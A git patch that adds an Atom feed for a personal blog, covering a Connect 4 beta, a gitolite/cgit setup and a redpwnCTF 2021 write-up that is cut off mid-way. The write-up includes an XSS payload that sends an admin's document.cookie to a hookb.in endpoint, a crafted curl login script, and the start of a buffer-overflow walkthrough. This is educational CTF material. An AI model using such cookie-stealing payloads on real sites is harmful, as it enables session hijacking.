From 861b955552d42b048d1ba17d4a48c953aeefe272 Mon Sep 17 00:00:00 2001 From: lonkaars Date: Fri, 16 Jul 2021 16:56:43 +0200 Subject: add rss feed --- public/atom.xml | 4403 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 4403 insertions(+) create mode 100644 public/atom.xml (limited to 'public/atom.xml') diff --git a/public/atom.xml b/public/atom.xml new file mode 100644 index 0000000..9f9430b --- /dev/null +++ b/public/atom.xml @@ -0,0 +1,4403 @@ + + + + Loek's excruciatingly interesting blog + This is where I post updates on things that I do + en-us + https://blog.pipeframe.xyz/atom.xml + + + Connect 4 beta live! + connect4 + /post/connect4 + April 24 2021 + <div class="contentWrapper"> + <p> + My connect four website is currently online as a public beta. You can visit the +website at + <a href="https://connect4.pipeframe.xyz"> + https://connect4.pipeframe.xyz + </a> + . A list of known bugs is on the +homepage, and all other issues should be submitted to + <a href="https://github.com/lonkaars/connect-4/issues"> + GitHub + </a> + . + </p> + <p> + If I encounter some very interesing bug that I think deserves it's own blog +post I'll write one about it of course. I have one more week from now to worry +about the connect four website, but after that I'm going to start preparing for +my school exams. + </p> +</div> + + + My git setup + git + /post/git + April 28 2021 + <div class="contentWrapper"> + <h2 id="overview"> + Overview + </h2> + <p> + I have two mechanisms set up for accessing my git server. I use gitolite for +ssh access and permission management. I also have cgit set up which generates +html pages for viewing your repositories and also hosts your repositories over +http, or https if you have it set up. + </p> + <h2 id="ssh-access-with-gitolite"> + SSH Access with gitolite + </h2> + <p> + Gitolite was a pain in the ass to set up because I didn't understand umasks +before I started trying to set it up. A + <em> + umask + </em> + is like the opposite of what +you'd enter when running + <code> + chmod + </code> + . For example: if I run + <code> + touch test + </code> + , I will +now have a file with the same permissions as + <code> + chmod 644 + </code> + . That looks something +like this: + </p> + <pre> + <div class="prismjs"> + <code class="language-sh" style="white-space:pre"> + <span class=""> + $ touch test + </span> + $ ls -l + <!-- --> + total bla bla + <!-- --> + -rw-r--r-- 1 loek users 0 Apr 28 12:28 test + <!-- --> + $ chmod 644 test + <!-- --> + $ ls -l + <!-- --> + total bla bla + <!-- --> + -rw-r--r-- 1 loek users 0 Apr 28 12:28 test + <!-- --> + $ # notice the same permissions on the 'test' file + </code> + </div> + </pre> + <p> + If I want gitolite to create repositories with default permissions so other +users can read the repositories, I have to set my umask to the opposite of 644. +Here's a quick explanation of + <code> + ls -l + </code> + 's output: + </p> + <pre> + <div class="prismjs"> + <code class="language-sh" style="white-space:pre"> + <span class=""> + -rw-r--r-- * user group size date time filename + </span> + |└┬┘└┬┘└┬┘ + <!-- --> + | | | └all users + <!-- --> + | | └owner group + <!-- --> + | └owner user + <!-- --> + └type + </code> + </div> + </pre> + <p> + Each digit in a + <code> + chmod + </code> + command sets the permission for the file owner, file +group, then everyone. That looks something like this: + </p> + <pre> + <div class="prismjs"> + <code class="language-sh" style="white-space:pre"> + <span class=""> + $ chmod 644 test + </span> + <!-- --> + decimal: 6 4 4 + <!-- --> + binary: 110 100 100 + <!-- --> + ls -l: - rw- r-- r-- + </code> + </div> + </pre> + <p> + Then we take the opposite of this to get the umask: + </p> + <pre> + <div class="prismjs"> + <code class="language-sh" style="white-space:pre"> + <span class=""> + $ chmod 755 directory -R + </span> + <!-- --> + ls -l: d rwx r-x r-x + <!-- --> + binary: 000 010 010 + <!-- --> + decimal: 0 2 2 + </code> + </div> + </pre> + <p> + And now my + <code> + .gitolite.rc + </code> + : + </p> + <pre> + <div class="prismjs"> + <code class="language-perl" style="white-space:pre"> + <span class="token variable"> + %RC + </span> + <span class=""> + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + </span> + <span class=""> + UMASK + </span> + <span class="token operator"> + => + </span> + <span class=""> + </span> + <span class="token number"> + 0022 + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + ROLES + </span> + <span class="token operator"> + => + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + READERS + </span> + <span class="token operator"> + => + </span> + <span class=""> + </span> + <span class="token number"> + 1 + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + WRITERS + </span> + <span class="token operator"> + => + </span> + <span class=""> + </span> + <span class="token number"> + 1 + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + ENABLE + </span> + <span class="token operator"> + => + </span> + <span class=""> + </span> + <span class="token punctuation"> + [ + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + 'ssh-authkeys' + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + 'git-config' + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + 'daemon' + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + 'gitweb' + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + ] + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token number"> + 1 + </span> + <span class="token punctuation"> + ; + </span> + </code> + </div> + </pre> + <h2 id="https-access-with-cgit"> + HTTP(S) Access with cgit + </h2> + <p> + Cgit is probably the easiest thing to set up. It has great built-in +documentation ( + <code> + man 5 cgitrc + </code> + ). Pretty much all configuration is in + <code> + /etc/cgitrc + </code> + (css/syntax highlighting isn't in there). The only reason I'm +posting my config here is because for some reason, the order of the options in +cgit's config matters: + </p> + <pre> + <div class="prismjs"> + <code class="language-rc" style="white-space:pre"> + <span class=""> + # + </span> + # cgit config + <!-- --> + # see cgitrc(5) for details + <!-- --> + <!-- --> + cache-size=0 + <!-- --> + enable-commit-graph=1 + <!-- --> + <!-- --> + css=/cgit.css + <!-- --> + logo=/cgit.png + <!-- --> + <!-- --> + virtual-root=/ + <!-- --> + remove-suffix=1 + <!-- --> + <!-- --> + root-title=git :tada: + <!-- --> + <!-- --> + ## + <!-- --> + ## List of common mimetypes + <!-- --> + ## + <!-- --> + mimetype.gif=image/gif + <!-- --> + mimetype.html=text/html + <!-- --> + mimetype.jpg=image/jpeg + <!-- --> + mimetype.jpeg=image/jpeg + <!-- --> + mimetype.pdf=application/pdf + <!-- --> + mimetype.png=image/png + <!-- --> + mimetype.svg=image/svg+xml + <!-- --> + <!-- --> + # Highlight source code with python pygments-based highlighter + <!-- --> + source-filter=/usr/lib/cgit/filters/syntax-highlighting.py + <!-- --> + <!-- --> + # Format markdown, restructuredtext, manpages, text files, and html files + <!-- --> + # through the right converters + <!-- --> + about-filter=/usr/lib/cgit/filters/about-formatting.sh + <!-- --> + <!-- --> + ## + <!-- --> + ## Search for these files in the root of the default branch of repositories + <!-- --> + ## for coming up with the about page: + <!-- --> + ## + <!-- --> + readme=:README.md + <!-- --> + readme=:readme.md + <!-- --> + readme=:README.rst + <!-- --> + readme=:readme.rst + <!-- --> + readme=:README.txt + <!-- --> + readme=:readme.txt + <!-- --> + readme=:README + <!-- --> + readme=:readme + <!-- --> + readme=:INSTALL.md + <!-- --> + readme=:install.md + <!-- --> + readme=:INSTALL.mkd + <!-- --> + readme=:install.mkd + <!-- --> + readme=:INSTALL.rst + <!-- --> + readme=:install.rst + <!-- --> + readme=:INSTALL.html + <!-- --> + readme=:install.html + <!-- --> + readme=:INSTALL.htm + <!-- --> + readme=:install.htm + <!-- --> + readme=:INSTALL.txt + <!-- --> + readme=:install.txt + <!-- --> + readme=:INSTALL + <!-- --> + readme=:install + <!-- --> + <!-- --> + scan-path=/mnt/scf/git/repositories + </code> + </div> + </pre> +</div> + + + Loek's excruciatingly interesting blog + index + /post/index + April 12 2021 + <div class="contentWrapper"> + <p> + Welcome to my blog page! This is where I post updates on things that I do such +as: + </p> + <ul> + <li> + Cool open source software that I think you should use + </li> + <li> + How to set up self-hosted applications + </li> + <li> + Rants about Microsoft Windows + </li> + <li> + Maybe some recipes I dunno + </li> + </ul> + <p> + The page you're looking at right now is also open-source! The code for this +page can be found on + <a href="https://github.com/lonkaars/blog"> + GitHub + </a> + , and should +also be available on + <a href="https://git.pipeframe.xyz"> + my private git server + </a> + . + </p> +</div> + + + redpwnCTF 2021 + redpwn2021 + /post/redpwn2021 + July 13 2021 + <div class="contentWrapper"> + <p> + This is the first 'real' CTF I've participated in. About two weeks ago, a +friend of mine was stuck on some challenges from the Radboud CTF. This was a +closed CTF more geared towards beginners (high school students), and only had a +few challenges which required deeper technical knowledge of web servers and +programming. Willem solved most of the challenges, and I helped solve 3 more. + </p> + <p> + Apart from those challenges, basically all my hacking knowledge comes from +computerphile videos, liveoverflow videos and making applications myself. + </p> + <h2 id="challenges"> + Challenges + </h2> + <h3 id="webpastebin-1"> + web/pastebin-1 + </h3> + <p> + This challenge is a simple XSS exploit. The website that's vulnerable is +supposed to be a clone of pastebin. I can enter any text into the paste area, +and it will get inserted as HTML code into the website when someone visits the +generated link. + </p> + <p> + The challenge has two sites: one with the pastebin clone, and one that visits +any pastebin url as the website administrator. The goal of this challenge is +given by it's description: + </p> + <blockquote> + <p> + Ah, the classic pastebin. Can you get the admin's cookies? + </p> + </blockquote> + <p> + In JS, you can read all cookies without the + <code> + HttpOnly + </code> + attribute by reading + <code> + document.cookie + </code> + . This allows us to read the cookies from the admin's browser, +but now we have to figure out a way to get them sent back to us. + </p> + <p> + Luckily, there's a free service called + <a href="https://hookbin.com/"> + hookbin + </a> + that +gives you an http endpoint to send anything to, and look at the request +details. + </p> + <p> + Combining these two a simple paste can be created: + </p> + <pre> + <div class="prismjs"> + <code class="language-html" style="white-space:pre"> + <span class="token tag punctuation"> + < + </span> + <span class="token tag"> + script + </span> + <span class="token tag punctuation"> + > + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript keyword"> + var + </span> + <span class="token script language-javascript"> + post + </span> + <span class="token script language-javascript operator"> + = + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript keyword"> + new + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript class-name"> + XMLHttpRequest + </span> + <span class="token script language-javascript punctuation"> + ( + </span> + <span class="token script language-javascript punctuation"> + ) + </span> + <span class="token script language-javascript punctuation"> + ; + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript"> + post + </span> + <span class="token script language-javascript punctuation"> + . + </span> + <span class="token script language-javascript method function property-access"> + open + </span> + <span class="token script language-javascript punctuation"> + ( + </span> + <span class="token script language-javascript string"> + "post" + </span> + <span class="token script language-javascript punctuation"> + , + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript string"> + "https://hookb.in/<endpoint url>" + </span> + <span class="token script language-javascript punctuation"> + ) + </span> + <span class="token script language-javascript punctuation"> + ; + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript"> + post + </span> + <span class="token script language-javascript punctuation"> + . + </span> + <span class="token script language-javascript method function property-access"> + send + </span> + <span class="token script language-javascript punctuation"> + ( + </span> + <span class="token script language-javascript dom variable"> + document + </span> + <span class="token script language-javascript punctuation"> + . + </span> + <span class="token script language-javascript property-access"> + cookie + </span> + <span class="token script language-javascript punctuation"> + ) + </span> + <span class="token script language-javascript punctuation"> + ; + </span> + <span class="token script language-javascript"> + </span> + <span class="token script language-javascript"> + </span> + <span class="token tag punctuation"> + </ + </span> + <span class="token tag"> + script + </span> + <span class="token tag punctuation"> + > + </span> + </code> + </div> + </pre> + <h3 id="cryptoscissor"> + crypto/scissor + </h3> + <p> + I wasn't planning on including this one, but it makes use of the excellent + <a href="https://gchq.github.io/CyberChef/"> + CyberChef + </a> + tool. The flag is given in the +challenge description, and is encrypted using a ceasar/rot13 cipher. A simple +python implementation of this cypher is included with the challenge, but I just +put it into CyberChef and started trying different offsets. + </p> + <h3 id="revwstrings"> + rev/wstrings + </h3> + <blockquote> + <p> + Some strings are wider than normal... + </p> + </blockquote> + <p> + This challenge has a binary that uses a simple + <code> + strcmp + </code> + to check the flag. When +running the program, the following output is visible: + </p> + <pre> + <div class="prismjs"> + <code class="language-sh" style="white-space:pre"> + <span class=""> + # ./wstrings + </span> + Welcome to flag checker 1.0. + <!-- --> + Give me a flag> + </code> + </div> + </pre> + <p> + My first stategy was running the + <code> + strings + </code> + utility on the + <code> + wstrings + </code> + binary, +but I didn't find the flag. What was interesting to me though was that I also +couldn't find the prompt text... This immediately made me check for other +string encodings. + </p> + <p> + Running the + <code> + strings + </code> + utility with the + <code> + -eL + </code> + flag tells + <code> + strings + </code> + to look for +32-bit little-endian encoded strings, and lo and behold the flag shows up! + </p> + <p> + This is because ascii strings are less 'wide' than 32-bit strings: + </p> + <pre> + <code> + --- ascii --- + +hex -> 0x68 0x65 0x6c 0x6c 0x6f +str -> h e l l o + </code> + </pre> + <p> + Notice how each character is represented by a single byte each (8 bits) in +ascii, as opposed to 32-bit characters in 32-bit land. + </p> + <pre> + <code> + --- 32-bit land --- + +hex -> 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f +str -> h e l l o + </code> + </pre> + <p> + I think 32-bit strings also have practical use for things like non-english +texts such as hebrew, chinese or japanese. Those characters take up more space +anyways, and you would waste less space by not using unicode escape characters. + </p> + <h3 id="websecure"> + web/secure + </h3> + <blockquote> + <p> + Just learned about encryption—now, my website is unhackable! + </p> + </blockquote> + <p> + This challenge is pretty simple if you know some of JS's quirks. Right at the +top of the file is an sqlite3 expression in JS: + </p> + <pre> + <div class="prismjs"> + <code class="language-js" style="white-space:pre"> + <span class="token comment"> + //////// + </span> + <span class=""> + </span> + <span class=""> + db + </span> + <span class="token punctuation"> + . + </span> + <span class="token method function property-access"> + exec + </span> + <span class="token punctuation"> + ( + </span> + <span class="token template-string template-punctuation string"> + ` + </span> + <span class="token template-string string"> + INSERT INTO users (username, password) VALUES ( + </span> + <span class="token template-string string"> + ' + </span> + <span class="token template-string interpolation interpolation-punctuation punctuation"> + ${ + </span> + <span class="token template-string interpolation function"> + btoa + </span> + <span class="token template-string interpolation punctuation"> + ( + </span> + <span class="token template-string interpolation string"> + 'admin' + </span> + <span class="token template-string interpolation punctuation"> + ) + </span> + <span class="token template-string interpolation interpolation-punctuation punctuation"> + } + </span> + <span class="token template-string string"> + ', + </span> + <span class="token template-string string"> + ' + </span> + <span class="token template-string interpolation interpolation-punctuation punctuation"> + ${ + </span> + <span class="token template-string interpolation function"> + btoa + </span> + <span class="token template-string interpolation punctuation"> + ( + </span> + <span class="token template-string interpolation"> + crypto + </span> + <span class="token template-string interpolation punctuation"> + . + </span> + <span class="token template-string interpolation property-access"> + randomUUID + </span> + <span class="token template-string interpolation punctuation"> + ) + </span> + <span class="token template-string interpolation interpolation-punctuation punctuation"> + } + </span> + <span class="token template-string string"> + ' + </span> + <span class="token template-string string"> + ) + </span> + <span class="token template-string template-punctuation string"> + ` + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + </code> + </div> + </pre> + <p> + This section of code immediately jumped out to me because I noticed that + <code> + crypto.randomUUID + </code> + wansn't actually being called. + </p> + <p> + Because the 'random uuid' is being fed into + <code> + btoa() + </code> + it becomes a base64 +encoded string. However, + <code> + btoa() + </code> + also expects a string as input. Because every +object in JS has a + <code> + .toString() + </code> + method, when you pass it into a function +expecting another type, JS will happily convert it for you without warning. + </p> + <p> + This means that the admin's password will always be a base64-encoded version of + <code> + crypto.randomUUID + </code> + 's source code. We can get that base64-encoded source code +by running the following in a NodeJS REPL: + </p> + <pre> + <div class="prismjs"> + <code class="language-js" style="white-space:pre"> + <span class="token comment"> + // import file system and crypto modules + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + var + </span> + <span class=""> + writeFileSync + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token function"> + require + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + 'fs' + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + . + </span> + <span class="token property-access"> + writeFileSync + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + var + </span> + <span class=""> + crypto + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token function"> + require + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + 'crypto' + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token comment"> + // write source to file + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + writeFileSync + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + './randomUUID.js' + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token function"> + btoa + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + crypto + </span> + <span class="token punctuation"> + . + </span> + <span class="token property-access"> + randomUUID + </span> + <span class="token punctuation"> + . + </span> + <span class="token method function property-access"> + toString + </span> + <span class="token punctuation"> + ( + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token string"> + 'utf-8' + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + </code> + </div> + </pre> + <p> + I made a simple shell script that calls cURL with the base64-encoded +parameters, and decodes the url-encoded flag afterwards: + </p> + <pre> + <div class="prismjs"> + <code class="language-sh" style="white-space:pre"> + <span class=""> + #!/bin/sh + </span> + <!-- --> + # https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell + <!-- --> + function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; } + <!-- --> + <!-- --> + urldecode $(curl -sX POST \ + <!-- --> + -d "username=$(printf 'admin' | base64)" \ + <!-- --> + -d "password=$(cat ./randomUUID.js)" \ + <!-- --> + https://secure.mc.ax/login) + </code> + </div> + </pre> + <h3 id="cryptobaby"> + crypto/baby + </h3> + <blockquote> + <p> + I want to do an RSA! + </p> + </blockquote> + <p> + This challenge is breaking RSA. It only works because the + <code> + n + </code> + parameter is +really small. + </p> + <p> + Googling for 'rsa decrypt n e c' yields + <a href="https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c"> + this + </a> + stackoverflow result, which links to + <a href="https://www.dcode.fr/rsa-cipher"> + dcode.fr + </a> + . The only thing left to do is +calculate + <code> + p + </code> + and + <code> + q + </code> + , which can be done using + <a href="https://wolframalpha.com/"> + wolfram +alpha + </a> + . + </p> + <h3 id="pwnbeginner-generic-pwn-number-0"> + pwn/beginner-generic-pwn-number-0 + </h3> + <blockquote> + <p> + rob keeps making me write beginner pwn! i'll show him... + </p> + <p> + <code> + nc mc.ax 31199 + </code> + </p> + </blockquote> + <p> + This was my first interaction with + <code> + gdb + </code> + . It was.. painful. After begging for +help in the redpwnCTF discord server about another waaaay harder challenge, an +organizer named asphyxia pointed me towards + <a href="https://github.com/hugsy/gef"> + gef + </a> + which single-handedly saved my sanity during the binary exploitation +challenges. + </p> + <p> + The first thing I did was use + <a href="https://github.com/radareorg/iaito"> + iaito + </a> + to +look at a dissassembly graph of the binary. Iaito is a graphical frontend to +the radare2 reverse engineering framework, and I didn't feel like learning two +things at the same time, so that's why I used it. While it's very +user-friendly, I didn't look into reverse engineering tools very much, and +didn't realise that iaito is still in development. Let's just say I ran into +some issues with project saving so I took lots of unnecessary repeated steps. + </p> + <p> + After trying to make sense of assembly code after just seeing it for the first +time, I instead decided looking at the source code would be a better idea since +I actually know c. + </p> + <pre> + <div class="prismjs"> + <code class="language-c" style="white-space:pre"> + <span class="token macro property directive-hash"> + # + </span> + <span class="token macro property directive keyword"> + include + </span> + <span class="token macro property"> + </span> + <span class="token macro property string"> + <stdio.h> + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token macro property directive-hash"> + # + </span> + <span class="token macro property directive keyword"> + include + </span> + <span class="token macro property"> + </span> + <span class="token macro property string"> + <string.h> + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token macro property directive-hash"> + # + </span> + <span class="token macro property directive keyword"> + include + </span> + <span class="token macro property"> + </span> + <span class="token macro property string"> + <stdlib.h> + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + const + </span> + <span class=""> + </span> + <span class="token keyword"> + char + </span> + <span class=""> + </span> + <span class="token operator"> + * + </span> + <span class=""> + inspirational_messages + </span> + <span class="token punctuation"> + [ + </span> + <span class="token punctuation"> + ] + </span> + <span class=""> + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"" + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"" + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token string"> + "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"" + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + int + </span> + <span class=""> + </span> + <span class="token function"> + main + </span> + <span class="token punctuation"> + ( + </span> + <span class="token keyword"> + void + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + srand + </span> + <span class="token punctuation"> + ( + </span> + <span class="token function"> + time + </span> + <span class="token punctuation"> + ( + </span> + <span class="token number"> + 0 + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + long + </span> + <span class=""> + inspirational_message_index + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token function"> + rand + </span> + <span class="token punctuation"> + ( + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class="token operator"> + % + </span> + <span class=""> + </span> + <span class="token punctuation"> + ( + </span> + <span class="token keyword"> + sizeof + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + inspirational_messages + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class="token operator"> + / + </span> + <span class=""> + </span> + <span class="token keyword"> + sizeof + </span> + <span class="token punctuation"> + ( + </span> + <span class="token keyword"> + char + </span> + <span class=""> + </span> + <span class="token operator"> + * + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + char + </span> + <span class=""> + heartfelt_message + </span> + <span class="token punctuation"> + [ + </span> + <span class="token number"> + 32 + </span> + <span class="token punctuation"> + ] + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + setbuf + </span> + <span class="token punctuation"> + ( + </span> + <span class="token constant"> + stdout + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token constant"> + NULL + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + setbuf + </span> + <span class="token punctuation"> + ( + </span> + <span class="token constant"> + stdin + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token constant"> + NULL + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + setbuf + </span> + <span class="token punctuation"> + ( + </span> + <span class="token constant"> + stderr + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token constant"> + NULL + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + inspirational_messages + </span> + <span class="token punctuation"> + [ + </span> + <span class=""> + inspirational_message_index + </span> + <span class="token punctuation"> + ] + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "can you write me a heartfelt message to cheer me up? :(" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + gets + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + heartfelt_message + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + if + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + inspirational_message_index + </span> + <span class="token operator"> + == + </span> + <span class=""> + </span> + <span class="token operator"> + - + </span> + <span class="token number"> + 1 + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + system + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "/bin/sh" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + </code> + </div> + </pre> + <p> + After looking at this source things became a lot clearer, because the only +input you can actually control is recieved from + <code> + gets(...); + </code> + </p> + <p> + Now comes the hard part: doing it, but in assembly! + </p> + <p> + Some recources you should consume before attempting binary exploitation would +be + <a href="https://www.youtube.com/watch?v=1S0aBV-Waeo"> + computerphile's video on buffer +overflows + </a> + and + <a href="https://cheat.sh/gdb"> + cheat.sh/gdb + </a> + for some basic gdb commands. The rest of +this section assumes you know the basics of both buffer overflows and gdb. + </p> + <p> + First, let's print a dissassembly of the + <code> + int main() + </code> + function: + </p> + <pre> + <code> + (gdb) disas main +Dump of assembler code for function main: + 0x000000000040127c <+134>: call 0x4010a0 <puts@plt> + 0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150 + 0x0000000000401288 <+146>: call 0x4010a0 <puts@plt> + 0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0 + 0x0000000000401294 <+158>: call 0x4010a0 <puts@plt> + 0x0000000000401299 <+163>: lea rax,[rbp-0x30] + 0x000000000040129d <+167>: mov rdi,rax + 0x00000000004012a0 <+170>: call 0x4010f0 <gets@plt> + 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff + 0x00000000004012aa <+180>: jne 0x4012b8 <main+194> + 0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8 + 0x00000000004012b3 <+189>: call 0x4010c0 <system@plt> + 0x00000000004012b8 <+194>: mov eax,0x0 + 0x00000000004012bd <+199>: leave + 0x00000000004012be <+200>: ret +End of assembler dump. + </code> + </pre> + <p> + This isn't the full output from gdb, but only the last few lines. A few things +should immediately stand out: the 3 + <code> + <puts@plt> + </code> + calls, and right after the +call to + <code> + <gets@plt> + </code> + . These are the assembly equivalent of: + </p> + <pre> + <div class="prismjs"> + <code class="language-c" style="white-space:pre"> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + inspirational_messages + </span> + <span class="token punctuation"> + [ + </span> + <span class=""> + inspirational_message_index + </span> + <span class="token punctuation"> + ] + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "can you write me a heartfelt message to cheer me up? :(" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + gets + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + heartfelt_message + </span> 